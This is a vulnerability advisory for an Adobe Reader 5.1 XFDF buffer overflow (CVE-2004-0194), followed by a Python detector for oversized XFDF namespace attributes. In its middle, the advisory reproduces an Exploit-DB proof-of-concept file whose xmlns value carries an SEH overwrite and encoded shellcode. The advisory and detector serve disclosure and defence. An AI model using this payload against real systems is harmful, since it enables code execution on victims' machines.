Vendor: Acrobat Reader
By: extraexploit@gmail.com
CVSS: 9.3 (HIGH)
Vulnerability type: Buffer Overflow
CWE: 120
Product Name: Acrobat Reader
Affected Version From: 5.1
Affected Version To: 5.1
Patch Exists: YES
Related CVE: CVE-2004-0194
CPE: a:adobe:acrobat_reader:5.1
Platforms Tested: Windows XP SP3
Year: 2011

Adobe Reader 5.1 XFDF Buffer Overflow Vulnerability (SEH)

Adobe Reader 5.1 is vulnerable to a stack-based buffer overflow when processing a specially crafted XFDF file. The flaw is a boundary error in the XFDF processing code. An attacker who supplies such a file can exploit it to execute arbitrary code in the context of the user running the vulnerable application.

Mitigation:

Upgrade to the latest version of Adobe Reader.

Exploit-DB raw data:

# Exploit Title: Adobe Reader 5.1 XFDF Buffer Overflow Vulnerability (SEH)
# Google Dork: N/A or filtype ".xfdf"
# Date: 04/01/2011
# Author: extraexploit@gmail.com / http://extraexploit.blogspot.com
# Software Link: http://www.oldversion.com/download/acrobat51.exe
# Version: Acrobat (formerly Adobe) Reader 5.1
# Tested on: XP SP3
# CVE : cve-2004-0194
# http://extraexploit.blogspot.com/2011/07/old-bug-for-new-job-cve-2004-0194.html

<?xml version="1.0" encoding="ISO-8859-1"?>
<xfdf xmlns="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAz AAUO<81>.AAAAAAAAAAAAAAAAAAAAAAAAAAT]ÚÞÙuô_WYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLZHK9GpC0GpQpK9IuTqN2PdNkQBTpLKCbTLLKV2EDNkCBQ8VoOGRjTfVQIoEaIPNLGLQqQlC2TlGPO1ZoVmC1XGKRL0V2QGLKRrR0LKG2GLC1ZpNkG0QhK5IPQdPJEQN0RpNkCxR8LKChQ0EQZsXcGLPINkVTNkVaIFEaIoP1O0LlIQZoTMC1KwEhIpPuIdGsCMIhEkQmQ4T5IrChNkQHVDEQICRFNkTLRkNkQHGlGqKcLKTDLKVaZpMYCtVDQ4QKCkQqCiQJRqKOM0QHQOPZNkGbZKNfQMRJEQLMLENYGpC0C0RpPhEaLKROOwKON5OKL0OEI2RvRHI6MEOMOmIoZuElTFCLEZOpIkIpQeEUOKCwGcCBPoRJGpQCIoXURCPaPlRCTnQuPxPeEPAA" xml:space="preserve">
<fields>
<field name="Date of Birth"><value>01-01-1960</value></field>
<field name="Your Name"><value>Mr. Customer</value></field>
</fields>
<ids original="FEBDB19E0CD32274C16CE13DCF244AD2" modified="5BE74DD4F607B7409DC03D600E466E12"/>
</xfdf>

Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17488.xfdf (cve-2004-0194.xfdf.xfdf)
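
A defensive check for the pattern the proof of concept above relies on, an oversized value in the `xmlns` attribute of the root `xfdf` element. This is an added example, not part of the Exploit-DB entry. The 256-byte limit and the name `inspect_xfdf` are assumptions, the expected namespace `http://ns.adobe.com/xfdf/` is the one defined by the XFDF specification, and both samples are constructed.

```python
import re

XFDF_NS = b"http://ns.adobe.com/xfdf/"  # namespace URI from the XFDF specification
MAX_ATTR_LEN = 256                       # assumed threshold, tune to your own forms

# Work on raw bytes: a hostile file need not be well-formed XML, so a strict
# parser would reject it without saying what looked wrong in the root tag.
ROOT_TAG = re.compile(rb"<xfdf(?=[\s/>])")
ATTR = re.compile(rb"\s+([A-Za-z_:][\w:.-]*)\s*=\s*(?:\"([^\"]*)\"|'([^']*)')")


def inspect_xfdf(data: bytes) -> list[str]:
    """Return findings for the root <xfdf> tag; an empty list means nothing was flagged."""
    root = ROOT_TAG.search(data)
    if root is None:
        return ["no <xfdf> root element"]
    findings, pos = [], root.end()
    # Walk the attributes one by one, starting right after "<xfdf".
    while (attr := ATTR.match(data, pos)) is not None:
        name = attr.group(1).decode("ascii")
        value = attr.group(2) if attr.group(2) is not None else attr.group(3)
        if len(value) > MAX_ATTR_LEN:
            findings.append(f"{name}: value is {len(value)} bytes (limit {MAX_ATTR_LEN})")
        if name == "xmlns" and value != XFDF_NS:
            findings.append("xmlns: not the XFDF namespace")
        pos = attr.end()
    # An unterminated quote or stray bytes leave the tag without its closing ">".
    if re.match(rb"\s*/?>", data[pos:pos + 16]) is None:
        findings.append("root tag is not closed after its attributes")
    return findings


# Constructed samples: a well-formed form export and one with a padded namespace.
BENIGN = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
          b'<xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve">\n'
          b'<fields><field name="Your Name"><value>Mr. Customer</value></field></fields>\n'
          b'</xfdf>\n')
SUSPICIOUS = BENIGN.replace(XFDF_NS, b"A" * 600)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, inspect_xfdf(sample))
```

Run it over `.xfdf` attachments or downloads at a mail or web gateway; a finding is a reason to quarantine the file, not a replacement for upgrading the reader.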